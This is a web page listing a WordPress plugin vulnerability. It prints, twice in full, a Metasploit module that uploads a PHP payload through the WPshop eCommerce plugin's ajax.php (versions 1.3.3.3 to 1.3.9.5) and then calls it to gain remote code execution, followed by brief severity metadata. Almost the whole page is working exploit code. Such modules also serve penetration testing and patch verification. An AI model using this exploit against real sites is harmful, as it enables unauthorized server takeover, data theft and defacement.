WordPress WPshop eCommerce 1.3.9.5 Shell Upload
WordPress WPshop eCommerce 1.3.9.5 Shell Upload, WordPress WPshop eCommerce plugins vulnerability, Wordpress plugins vulnerability, Security vulnerability
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
code execution. This module has been tested successfully on WordPress WPshop eCommerce
1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery, initial msf module
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7830'],
['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
'DisclosureDate' => 'Mar 09 2015',
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
end
def exploit
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
data = Rex::MIME::Message.new
data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
post_data = data.to_s
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("#{peer} - Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
5
)
end
end
References:
https://research.g0blin.co.uk/g0blin-00036/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
code execution. This module has been tested successfully on WordPress WPshop eCommerce
1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery, initial msf module
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7830'],
['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
'DisclosureDate' => 'Mar 09 2015',
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
end
def exploit
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
data = Rex::MIME::Message.new
data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
post_data = data.to_s
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("#{peer} - Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
5
)
end
end
References:
https://research.g0blin.co.uk/g0blin-00036/
2015.04.27 | Roberto Soares Espreto | High |
CWE-264 | N/A | No | Yes |
Join the conversation